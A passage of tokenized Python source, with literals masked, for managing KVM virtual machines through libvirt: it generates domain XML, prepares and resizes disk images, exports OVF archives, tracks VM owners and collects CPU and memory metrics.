<EOL> libvirt_conf_dom = generate_libvirt_conf ( settings ) <EOL> log . info ( "<STR_LIT>" ) <EOL> conn = libvirt . open ( "<STR_LIT>" ) <EOL> conn . defineXML ( libvirt_conf_dom . toxml ( ) ) <EOL> log . info ( "<STR_LIT>" ) <EOL> def prepare_file_system ( settings , storage_pool ) : <EOL> """<STR_LIT>""" <EOL> config = get_config ( ) <EOL> log = get_logger ( ) <EOL> images_dir = path . join ( config . getstring ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> storage_pool , "<STR_LIT>" ) <EOL> target_dir = path . join ( config . getstring ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> storage_pool , "<STR_LIT>" , "<STR_LIT>" ) <EOL> for disk_index , disk in enumerate ( settings . get ( "<STR_LIT>" , [ ] ) ) : <EOL> disk_template_path = path . join ( target_dir , disk [ "<STR_LIT>" ] ) <EOL> if disk [ "<STR_LIT>" ] == "<STR_LIT:file>" : <EOL> volume_name = "<STR_LIT>" % disk_index <EOL> disk [ "<STR_LIT>" ] = '<STR_LIT>' % ( settings [ "<STR_LIT>" ] , settings [ "<STR_LIT>" ] , <EOL> volume_name , disk . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> disk_deploy_path = path . join ( images_dir , disk [ "<STR_LIT>" ] ) <EOL> shutil . copy2 ( disk_template_path , disk_deploy_path ) <EOL> diskspace = settings . get ( '<STR_LIT>' ) <EOL> if diskspace : <EOL> diskspace = int ( float ( diskspace ) ) <EOL> current_size = int ( execute ( "<STR_LIT>" <EOL> % disk_deploy_path ) ) / <NUM_LIT> / <NUM_LIT> / <NUM_LIT> <EOL> if diskspace > current_size : <EOL> log . info ( '<STR_LIT>' % ( disk_deploy_path , <EOL> current_size , diskspace ) ) <EOL> execute ( "<STR_LIT>" % ( disk_deploy_path , diskspace ) ) <EOL> else : <EOL> log . info ( '<STR_LIT>' <EOL> % ( disk_deploy_path , diskspace , current_size ) ) <EOL> elif disk [ "<STR_LIT>" ] in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> disk_deploy_path = disk [ "<STR_LIT>" ] <EOL> execute ( "<STR_LIT>" % ( disk_template_path , disk_deploy_path ) ) <EOL> def adjust_setting_to_systems_resources ( ovf_template_settings ) : <EOL> """<STR_LIT>""" <EOL> st = ovf_template_settings <EOL> st [ "<STR_LIT>" ] = str ( min ( sysres . get_ram_size_gb ( ) , float ( st . get ( "<STR_LIT>" , <NUM_LIT:10> ** <NUM_LIT:30> ) ) ) ) <EOL> st [ "<STR_LIT>" ] = str ( min ( float ( st [ "<STR_LIT>" ] ) , float ( st [ "<STR_LIT>" ] ) ) ) <EOL> st [ "<STR_LIT>" ] = str ( min ( sysres . get_cpu_count ( ) , int ( st . get ( "<STR_LIT>" , <NUM_LIT:10> ** <NUM_LIT:10> ) ) ) ) <EOL> st [ "<STR_LIT>" ] = str ( min ( int ( st [ "<STR_LIT>" ] ) , int ( st [ "<STR_LIT>" ] ) ) ) <EOL> errors = [ ] <EOL> if float ( st [ "<STR_LIT>" ] ) > float ( st [ "<STR_LIT>" ] ) : <EOL> errors . append ( "<STR_LIT>" % <EOL> ( st [ "<STR_LIT>" ] , st [ "<STR_LIT>" ] ) ) <EOL> if int ( st [ "<STR_LIT>" ] ) > int ( st [ "<STR_LIT>" ] ) : <EOL> errors . append ( "<STR_LIT>" % <EOL> ( st [ "<STR_LIT>" ] , st [ "<STR_LIT>" ] ) ) <EOL> return errors <EOL> def get_available_instances ( ) : <EOL> """<STR_LIT>""" <EOL> conn = libvirt . open ( "<STR_LIT>" ) <EOL> name_list = conn . listDefinedDomains ( ) <EOL> return dict ( zip ( name_list , name_list ) ) <EOL> def get_all_instances ( ) : <EOL> """<STR_LIT>""" <EOL> return get_available_instances ( ) <EOL> def generate_libvirt_conf ( settings ) : <EOL> """<STR_LIT>""" <EOL> libvirt_conf_dom = xml . dom . minidom . Document ( ) <EOL> domain_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> domain_dom . setAttribute ( "<STR_LIT:type>" , settings [ "<STR_LIT>" ] ) <EOL> libvirt_conf_dom . appendChild ( domain_dom ) <EOL> name_dom = libvirt_conf_dom . createElement ( "<STR_LIT:name>" ) <EOL> name_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> name_dom . appendChild ( name_value ) <EOL> domain_dom . appendChild ( name_dom ) <EOL> uuid_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> uuid_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> uuid_dom . appendChild ( uuid_value ) <EOL> domain_dom . appendChild ( uuid_dom ) <EOL> memory_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> memory_value = libvirt_conf_dom . createTextNode ( str ( int ( float ( settings [ "<STR_LIT>" ] ) * <NUM_LIT> ** <NUM_LIT:2> ) ) ) <EOL> memory_dom . appendChild ( memory_value ) <EOL> domain_dom . appendChild ( memory_dom ) <EOL> vcpu_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> vcpu_value = libvirt_conf_dom . createTextNode ( str ( settings [ "<STR_LIT>" ] ) ) <EOL> vcpu_dom . appendChild ( vcpu_value ) <EOL> domain_dom . appendChild ( vcpu_dom ) <EOL> os_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> os_type_dom = libvirt_conf_dom . createElement ( "<STR_LIT:type>" ) <EOL> os_type_dom . setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] ) <EOL> os_type_dom . setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] ) <EOL> os_type_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> os_type_dom . appendChild ( os_type_value ) <EOL> os_dom . appendChild ( os_type_dom ) <EOL> os_boot_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> os_boot_dom . setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] ) <EOL> os_dom . appendChild ( os_boot_dom ) <EOL> domain_dom . appendChild ( os_dom ) <EOL> features_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> for feature in settings [ "<STR_LIT>" ] : <EOL> feature_dom = libvirt_conf_dom . createElement ( feature ) <EOL> features_dom . appendChild ( feature_dom ) <EOL> domain_dom . appendChild ( features_dom ) <EOL> clock_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> clock_dom . setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] ) <EOL> domain_dom . appendChild ( clock_dom ) <EOL> timer_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> timer_dom . setAttribute ( "<STR_LIT:name>" , "<STR_LIT>" ) <EOL> timer_dom . setAttribute ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> clock_dom . appendChild ( timer_dom ) <EOL> on_poweroff_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> on_poweroff_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> on_poweroff_dom . appendChild ( on_poweroff_value ) <EOL> domain_dom . appendChild ( on_poweroff_dom ) <EOL> on_reboot_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> on_reboot_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> on_reboot_dom . appendChild ( on_reboot_value ) <EOL> domain_dom . appendChild ( on_reboot_dom ) <EOL> on_crash_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> on_crash_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> on_crash_dom . appendChild ( on_crash_value ) <EOL> domain_dom . appendChild ( on_crash_dom ) <EOL> devices_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> domain_dom . appendChild ( devices_dom ) <EOL> emulator_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> emulator_value = libvirt_conf_dom . createTextNode ( settings [ "<STR_LIT>" ] ) <EOL> emulator_dom . appendChild ( emulator_value ) <EOL> devices_dom . appendChild ( emulator_dom ) <EOL> drive_letter_count = <NUM_LIT:0> <EOL> for disk in settings [ "<STR_LIT>" ] : <EOL> if disk [ "<STR_LIT>" ] == "<STR_LIT:file>" : <EOL> disk_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> disk_dom . setAttribute ( "<STR_LIT:type>" , disk [ "<STR_LIT:type>" ] ) <EOL> disk_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> devices_dom . appendChild ( disk_dom ) <EOL> driver_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> driver_dom . setAttribute ( "<STR_LIT:name>" , "<STR_LIT>" ) <EOL> driver_dom . setAttribute ( "<STR_LIT:type>" , disk . get ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> driver_dom . setAttribute ( "<STR_LIT>" , "<STR_LIT:none>" ) <EOL> disk_dom . appendChild ( driver_dom ) <EOL> disk_source_dom = libvirt_conf_dom . createElement ( "<STR_LIT:source>" ) <EOL> config = get_config ( ) <EOL> image_path = path . join ( config . getstring ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> config . getstring ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> disk_source_dom . setAttribute ( "<STR_LIT:file>" , path . join ( image_path , <EOL> disk [ "<STR_LIT>" ] ) ) <EOL> disk_dom . appendChild ( disk_source_dom ) <EOL> disk_target_dom = libvirt_conf_dom . createElement ( "<STR_LIT:target>" ) <EOL> disk_target_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_target_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_dom . appendChild ( disk_target_dom ) <EOL> elif disk [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> disk_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> disk_dom . setAttribute ( "<STR_LIT:type>" , disk [ "<STR_LIT:type>" ] ) <EOL> disk_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> devices_dom . appendChild ( disk_dom ) <EOL> driver_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> driver_dom . setAttribute ( "<STR_LIT:name>" , "<STR_LIT>" ) <EOL> driver_dom . setAttribute ( "<STR_LIT>" , "<STR_LIT:none>" ) <EOL> devices_dom . appendChild ( driver_dom ) <EOL> disk_source_dom = libvirt_conf_dom . createElement ( "<STR_LIT:source>" ) <EOL> disk_source_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_dom . appendChild ( disk_source_dom ) <EOL> disk_target_dom = libvirt_conf_dom . createElement ( "<STR_LIT:target>" ) <EOL> disk_target_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_target_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_dom . appendChild ( disk_target_dom ) <EOL> elif ( disk [ "<STR_LIT>" ] == "<STR_LIT>" ) : <EOL> disk_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> disk_dom . setAttribute ( "<STR_LIT:type>" , disk [ "<STR_LIT:type>" ] ) <EOL> disk_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> devices_dom . appendChild ( disk_dom ) <EOL> disk_source_dom = libvirt_conf_dom . createElement ( "<STR_LIT:source>" ) <EOL> disk_source_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_dom . appendChild ( disk_source_dom ) <EOL> disk_target_dom = libvirt_conf_dom . createElement ( "<STR_LIT:target>" ) <EOL> disk_target_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_target_dom . setAttribute ( "<STR_LIT>" , disk [ "<STR_LIT>" ] ) <EOL> disk_dom . appendChild ( disk_target_dom ) <EOL> drive_letter_count = drive_letter_count + <NUM_LIT:1> <EOL> for interface in settings [ "<STR_LIT>" ] : <EOL> interface_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> interface_dom . setAttribute ( "<STR_LIT:type>" , interface [ "<STR_LIT:type>" ] ) <EOL> devices_dom . appendChild ( interface_dom ) <EOL> interface_source_dom = libvirt_conf_dom . createElement ( "<STR_LIT:source>" ) <EOL> interface_source_dom . setAttribute ( "<STR_LIT>" , interface [ "<STR_LIT>" ] ) <EOL> interface_dom . appendChild ( interface_source_dom ) <EOL> if '<STR_LIT>' in interface : <EOL> interface_mac_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> interface_mac_dom . setAttribute ( "<STR_LIT:address>" , interface [ "<STR_LIT>" ] ) <EOL> interface_dom . appendChild ( interface_mac_dom ) <EOL> elif '<STR_LIT>' in settings : <EOL> interface_mac_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> interface_mac_dom . setAttribute ( "<STR_LIT:address>" , settings [ "<STR_LIT>" ] ) <EOL> interface_dom . appendChild ( interface_mac_dom ) <EOL> if '<STR_LIT>' in settings : <EOL> interface_filter_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> interface_filter_dom . setAttribute ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> interface_dom . appendChild ( interface_filter_dom ) <EOL> interface_filter_ip_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> interface_filter_ip_dom . setAttribute ( "<STR_LIT:name>" , '<STR_LIT>' ) <EOL> interface_filter_ip_dom . setAttribute ( "<STR_LIT:value>" , settings [ '<STR_LIT>' ] ) <EOL> interface_filter_dom . appendChild ( interface_filter_ip_dom ) <EOL> serial_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> serial_dom . setAttribute ( "<STR_LIT:type>" , settings [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] ) <EOL> devices_dom . appendChild ( serial_dom ) <EOL> serial_target_dom = libvirt_conf_dom . createElement ( "<STR_LIT:target>" ) <EOL> serial_target_dom . setAttribute ( "<STR_LIT:port>" , str ( settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) ) <EOL> serial_dom . appendChild ( serial_target_dom ) <EOL> console_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> console_dom . setAttribute ( "<STR_LIT:type>" , settings [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] ) <EOL> devices_dom . appendChild ( console_dom ) <EOL> console_target_dom = libvirt_conf_dom . createElement ( "<STR_LIT:target>" ) <EOL> console_target_dom . setAttribute ( "<STR_LIT:port>" , str ( settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) ) <EOL> console_dom . appendChild ( console_target_dom ) <EOL> input_type_dom = libvirt_conf_dom . createElement ( "<STR_LIT:input>" ) <EOL> input_type_dom . setAttribute ( "<STR_LIT:type>" , "<STR_LIT>" ) <EOL> input_type_dom . setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] ) <EOL> devices_dom . appendChild ( input_type_dom ) <EOL> graphics_dom = libvirt_conf_dom . createElement ( "<STR_LIT>" ) <EOL> graphics_dom . setAttribute ( "<STR_LIT:type>" , settings [ "<STR_LIT>" ] [ "<STR_LIT:type>" ] ) <EOL> graphics_dom . setAttribute ( "<STR_LIT:port>" , str ( settings [ "<STR_LIT>" ] [ "<STR_LIT:port>" ] ) ) <EOL> graphics_dom . setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> graphics_dom . setAttribute ( "<STR_LIT>" , settings [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> devices_dom . appendChild ( graphics_dom ) <EOL> return libvirt_conf_dom <EOL> def save_as_ovf ( vm_settings , storage_pool , unpack = True ) : <EOL> """<STR_LIT>""" <EOL> config = get_config ( ) <EOL> log = get_logger ( ) <EOL> target_dir = path . join ( config . getstring ( '<STR_LIT>' , '<STR_LIT>' ) , storage_pool , "<STR_LIT>" ) <EOL> if unpack : <EOL> target_dir = path . join ( target_dir , '<STR_LIT>' ) <EOL> msg = "<STR_LIT>" <EOL> log . info ( msg ) <EOL> vm_settings [ "<STR_LIT>" ] = _prepare_disks ( vm_settings , target_dir ) <EOL> msg = "<STR_LIT>" <EOL> log . info ( msg ) <EOL> ovf = _generate_ovf_file ( vm_settings ) <EOL> ovf_fnm = path . join ( target_dir , "<STR_LIT>" % vm_settings [ "<STR_LIT>" ] ) <EOL> with open ( ovf_fnm , '<STR_LIT:w>' ) as f : <EOL> ovf . writeFile ( f , pretty = True , encoding = '<STR_LIT>' ) <EOL> msg = "<STR_LIT>" <EOL> log . info ( msg ) <EOL> arch_location = path . join ( config . getstring ( '<STR_LIT>' , '<STR_LIT>' ) , storage_pool , "<STR_LIT>" ) <EOL> ovf_archive_fnm = path . join ( arch_location , "<STR_LIT>" % vm_settings [ "<STR_LIT>" ] ) <EOL> with closing ( tarfile . open ( ovf_archive_fnm , "<STR_LIT:w>" ) ) as tar : <EOL> tar . add ( ovf_fnm , arcname = path . basename ( ovf_fnm ) ) <EOL> for disk in vm_settings [ "<STR_LIT>" ] : <EOL> tar . add ( disk [ "<STR_LIT>" ] , arcname = path . basename ( disk [ "<STR_LIT>" ] ) ) <EOL> if not unpack : <EOL> os . remove ( ovf_fnm ) <EOL> for disk in vm_settings [ "<STR_LIT>" ] : <EOL> os . remove ( disk [ "<STR_LIT>" ] ) <EOL> calculate_hash ( ovf_archive_fnm ) <EOL> msg = "<STR_LIT>" % ovf_archive_fnm <EOL> log . info ( msg ) <EOL> def _prepare_disks ( vm_settings , target_dir ) : <EOL> """<STR_LIT>""" <EOL> disk_list_dom = get_libvirt_conf_xml ( vm_settings [ "<STR_LIT>" ] ) . getElementsByTagName ( "<STR_LIT>" ) [ <NUM_LIT:0> ] . getElementsByTagName ( "<STR_LIT>" ) <EOL> disk_num , disk_list = <NUM_LIT:0> , [ ] <EOL> for disk_dom in disk_list_dom : <EOL> if disk_dom . getAttribute ( "<STR_LIT>" ) == "<STR_LIT>" : <EOL> disk_num += <NUM_LIT:1> <EOL> source_dom = disk_dom . getElementsByTagName ( "<STR_LIT:source>" ) [ <NUM_LIT:0> ] <EOL> filename = "<STR_LIT>" % ( vm_settings [ "<STR_LIT>" ] , disk_num ) <EOL> new_path = path . join ( target_dir , filename ) <EOL> if disk_dom . getAttribute ( "<STR_LIT:type>" ) == "<STR_LIT:file>" : <EOL> disk_path = source_dom . getAttribute ( "<STR_LIT:file>" ) <EOL> shutil . copy2 ( disk_path , new_path ) <EOL> elif disk_dom . getAttribute ( "<STR_LIT:type>" ) == "<STR_LIT>" : <EOL> source_dev = source_dom . getAttribute ( "<STR_LIT>" ) <EOL> execute ( "<STR_LIT>" % ( source_dev , new_path ) ) <EOL> disk_dict = { <EOL> "<STR_LIT>" : str ( get_file_size_bytes ( new_path ) ) , <EOL> "<STR_LIT:filename>" : filename , <EOL> "<STR_LIT>" : new_path , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( disk_num ) , <EOL> "<STR_LIT>" : "<STR_LIT>" % ( disk_num ) , <EOL> "<STR_LIT>" : str ( get_kvm_disk_capacity_bytes ( new_path ) ) <EOL> } <EOL> disk_list . append ( disk_dict ) <EOL> return disk_list <EOL> def get_kvm_disk_capacity_bytes ( path ) : <EOL> msg = "<STR_LIT>" % path <EOL> get_logger ( ) . info ( msg ) <EOL> res = execute ( "<STR_LIT>" % ( path ) ) <EOL> rows = res . split ( "<STR_LIT:\n>" ) [ <NUM_LIT:2> : ] <EOL> capacity = <NUM_LIT:0> <EOL> for row in rows : <EOL> row_elements = row . split ( "<STR_LIT:U+002C>" ) <EOL> used , available = int ( row_elements [ <NUM_LIT:3> ] ) , int ( row_elements [ <NUM_LIT:4> ] ) <EOL> capacity += used + available <EOL> return capacity * <NUM_LIT> <EOL> def _generate_ovf_file ( vm_settings ) : <EOL> """<STR_LIT>""" <EOL> ovf = OvfFile ( ) <EOL> ovf . files = [ ] <EOL> ovf . createEnvelope ( ) <EOL> ovf . envelope . setAttribute ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> instanceId = <NUM_LIT:0> <EOL> virtualSystem = ovf . createVirtualSystem ( ident = vm_settings [ "<STR_LIT>" ] , <EOL> info = "<STR_LIT>" ) <EOL> hardwareSection = ovf . createVirtualHardwareSection ( node = virtualSystem , <EOL> ident = "<STR_LIT>" , <EOL> info = "<STR_LIT>" ) <EOL> ovf . createSystem ( hardwareSection , "<STR_LIT>" , str ( instanceId ) , <EOL> { "<STR_LIT>" : "<STR_LIT>" % ( vm_settings [ "<STR_LIT>" ] , vm_settings [ "<STR_LIT>" ] ) } ) <EOL> instanceId += <NUM_LIT:1> <EOL> for bound , cpu in zip ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ vm_settings . get ( "<STR_LIT>" % pfx ) for pfx in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] ) : <EOL> if cpu : <EOL> ovf . addResourceItem ( hardwareSection , { <EOL> "<STR_LIT>" : "<STR_LIT>" % cpu , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" % cpu , <EOL> "<STR_LIT>" : str ( instanceId ) , <EOL> "<STR_LIT>" : "<STR_LIT:3>" , <EOL> "<STR_LIT>" : cpu <EOL> } , bound = bound ) <EOL> instanceId += <NUM_LIT:1> <EOL> for bound , memory in zip ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> [ vm_settings . get ( "<STR_LIT>" % pfx ) for pfx in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] ) : <EOL> if memory : <EOL> ovf . addResourceItem ( hardwareSection , { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" % memory , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" % memory , <EOL> "<STR_LIT>" : str ( instanceId ) , <EOL> "<STR_LIT>" : "<STR_LIT:4>" , <EOL> "<STR_LIT>" : memory <EOL> } , bound = bound ) <EOL> instanceId += <NUM_LIT:1> <EOL> network_list = [ ] <EOL> for interface in vm_settings [ "<STR_LIT>" ] : <EOL> if interface [ "<STR_LIT:type>" ] == "<STR_LIT>" : <EOL> ovf . addResourceItem ( hardwareSection , { <EOL> "<STR_LIT>" : interface [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : "<STR_LIT:true>" , <EOL> "<STR_LIT>" : "<STR_LIT>" % interface [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : interface [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" % interface [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : "<STR_LIT>" % instanceId , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } ) <EOL> network_list . append ( { <EOL> "<STR_LIT>" : interface [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : interface [ "<STR_LIT>" ] , <EOL> "<STR_LIT:description>" : "<STR_LIT>" <EOL> } ) <EOL> instanceId += <NUM_LIT:1> <EOL> ovf . createNetworkSection ( network_list , "<STR_LIT>" ) <EOL> ovf_disk_list = [ ] <EOL> for disk in vm_settings [ "<STR_LIT>" ] : <EOL> ref_file = OvfReferencedFile ( path = disk [ "<STR_LIT>" ] , href = disk [ "<STR_LIT:filename>" ] , <EOL> file_id = disk [ "<STR_LIT>" ] , size = disk [ "<STR_LIT>" ] ) <EOL> ovf . addReferencedFile ( ref_file ) <EOL> ovf_disk_list . append ( { <EOL> "<STR_LIT>" : disk [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : disk [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : str ( disk [ "<STR_LIT>" ] ) , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None , <EOL> "<STR_LIT>" : None <EOL> } ) <EOL> ovf . createReferences ( ) <EOL> ovf . createDiskSection ( ovf_disk_list , "<STR_LIT>" ) <EOL> doc = xml . dom . minidom . Document ( ) <EOL> on_section = doc . createElement ( "<STR_LIT>" ) <EOL> on_section . setAttribute ( "<STR_LIT>" , "<STR_LIT:false>" ) <EOL> virtualSystem . appendChild ( on_section ) <EOL> info_dom = doc . createElement ( "<STR_LIT>" ) <EOL> on_section . appendChild ( info_dom ) <EOL> info_value = doc . createTextNode ( "<STR_LIT>" ) <EOL> info_dom . appendChild ( info_value ) <EOL> features_dom = doc . createElement ( "<STR_LIT>" ) <EOL> on_section . appendChild ( features_dom ) <EOL> admin_password = doc . createElement ( '<STR_LIT>' ) <EOL> on_section . appendChild ( admin_password ) <EOL> password_value = doc . createTextNode ( vm_settings [ '<STR_LIT>' ] ) <EOL> admin_password . appendChild ( password_value ) <EOL> for feature in vm_settings [ "<STR_LIT>" ] : <EOL> feature_dom = doc . createElement ( feature ) <EOL> features_dom . appendChild ( feature_dom ) <EOL> return ovf <EOL> def get_id_by_uuid ( conn , uuid , backend = "<STR_LIT>" ) : <EOL> return None if conn . lookupByUUIDString ( uuid ) . ID ( ) < <NUM_LIT:0> else conn . lookupByUUIDString ( uuid ) . ID ( ) <EOL> def set_owner ( conn , uuid , owner ) : <EOL> """<STR_LIT>""" <EOL> owners_file = '<STR_LIT>' <EOL> if not os . path . exists ( owners_file ) : <EOL> open ( owners_file , '<STR_LIT:a>' ) . close ( ) <EOL> with open ( owners_file , '<STR_LIT>' ) as f : <EOL> kvmowners = f . read ( ) <EOL> kvmowners = kvmowners . split ( '<STR_LIT:\n>' ) <EOL> added = False <EOL> for k , v in enumerate ( kvmowners ) : <EOL> if uuid in v : <EOL> kvmowners [ k ] = '<STR_LIT:=>' . join ( [ str ( uuid ) , str ( owner ) ] ) <EOL> added = True <EOL> if not added : <EOL> kvmowners . append ( '<STR_LIT:=>' . join ( [ str ( uuid ) , str ( owner ) ] ) ) <EOL> with open ( owners_file + '<STR_LIT>' , '<STR_LIT>' ) as f : <EOL> f . write ( '<STR_LIT:\n>' . join ( kvmowners ) ) <EOL> os . rename ( owners_file , owners_file + '<STR_LIT>' ) <EOL> os . rename ( owners_file + '<STR_LIT>' , owners_file ) <EOL> vmid = get_id_by_uuid ( conn , uuid ) <EOL> if not vmid : <EOL> return <EOL> vm = conn . lookupByID ( vmid ) <EOL> domain = ET . fromstring ( vm . XMLDesc ( <NUM_LIT:0> ) ) <EOL> metadata = domain . find ( '<STR_LIT>' ) or ET . SubElement ( domain , '<STR_LIT>' ) <EOL> owner_e = ET . SubElement ( metadata , ET . QName ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> owner_e . text = owner <EOL> open ( '<STR_LIT>' % ( vm . name ( ) ) , '<STR_LIT:w>' ) . write ( ET . tostring ( domain ) ) <EOL> data = open ( '<STR_LIT>' % ( vm . name ( ) ) , '<STR_LIT:r>' ) . read ( ) <EOL> domain_n = ET . fromstring ( data ) <EOL> owner_e = domain_n . find ( '<STR_LIT>' ) <EOL> assert owner_e is not None <EOL> assert owner_e . text == owner <EOL> return owner_e . text <EOL> def get_owner ( conn , uuid ) : <EOL> """<STR_LIT>""" <EOL> owners_file = '<STR_LIT>' <EOL> with open ( owners_file , '<STR_LIT>' ) as f : <EOL> kvmowners = f . read ( ) <EOL> kvmowners = kvmowners . split ( '<STR_LIT:\n>' ) <EOL> for k , v in enumerate ( kvmowners ) : <EOL> if uuid in v : <EOL> return v . split ( '<STR_LIT:=>' ) [ <NUM_LIT:1> ] <EOL> vmid = get_id_by_uuid ( conn , uuid ) <EOL> if not vmid : <EOL> return <EOL> vm = conn . lookupByID ( vmid ) <EOL> data = open ( '<STR_LIT>' % ( vm . name ( ) ) , '<STR_LIT:r>' ) . read ( ) <EOL> domain = ET . fromstring ( data ) <EOL> owner = domain . find ( '<STR_LIT>' ) <EOL> if owner is not None : <EOL> return owner . text <EOL> def vm_metrics ( conn , vm ) : <EOL> def cpu_usage ( ) : <EOL> hn_stats = conn . getCPUStats ( True , <NUM_LIT:0> ) <EOL> if hn_stats is None : <EOL> return <NUM_LIT:0.0> <EOL> time_now = ( vm . getCPUStats ( True , <NUM_LIT:0> ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , <EOL> sum ( hn_stats . itervalues ( ) ) ) <EOL> time_was = roll_data ( '<STR_LIT>' % vm . ID ( ) , time_now , [ <NUM_LIT:0> ] * <NUM_LIT:6> ) <EOL> deltas = [ yi - xi for yi , xi in zip ( time_now , time_was ) ] <EOL> try : <EOL> cpu_pct = deltas [ <NUM_LIT:0> ] / float ( deltas [ <NUM_LIT:1> ] ) <EOL> except ZeroDivisionError : <EOL> cpu_pct = <NUM_LIT:0> <EOL> return cpu_pct <EOL> def memory_usage ( ) : <EOL> return vm . memoryStats ( ) [ '<STR_LIT>' ] / <NUM_LIT> <EOL> return { '<STR_LIT>' : cpu_usage ( ) , <EOL> '<STR_LIT>' : memory_usage ( ) , } <EOL> def compile_cleanup ( conn , vm ) : <EOL> domain = ET . fromstring ( vm . XMLDesc ( <NUM_LIT:0> ) ) <EOL> disk_elements = domain . findall ( '<STR_LIT>' ) <EOL> cleanup_list = [ ] <EOL> for disk in disk_elements : <EOL> if disk . attrib . get ( '<STR_LIT:type>' ) != '<STR_LIT:file>' or disk . attrib . get ( '<STR_LIT>' 